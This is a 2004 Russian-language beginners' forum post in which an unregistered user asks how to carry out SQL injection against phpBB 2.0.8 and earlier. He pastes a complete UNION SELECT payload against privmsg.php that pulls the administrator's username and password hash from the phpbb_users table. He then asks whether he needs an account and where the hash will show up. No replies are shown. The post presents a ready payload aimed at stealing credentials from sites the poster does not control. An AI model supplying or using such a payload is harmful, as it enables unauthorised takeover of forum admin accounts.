Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Господа, будьте снисходительны, не бросайтесь сразу штрафовать за, как вам кажется, глупые вопросы - beginners на то и beginners.
Помогите с SQL-инъекцией в PhpBB <=2.0.8 31.03.04 22:18
Автор: Toshik Статус: Незарегистрированный пользователь
|
Научите пожалуйста или подскажите ссылку на хорошую статью как применять SQL injection !!!
Например для получения хэша админа:надо ввести это- site.com/phpBB/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20WHERE%20user_level=1%20LIMIT%201/*
Вопросы:
1).Надо ли иметь регистрацию на форуме ???
2).Где должен появиться хэша админа ???
P.S - помогите пожалуйста, и не судите по тупым вопросам, т.к я в этом деле новичок !!!
|
|
|
подробно о проекте
Анализ криптографических сетевых...
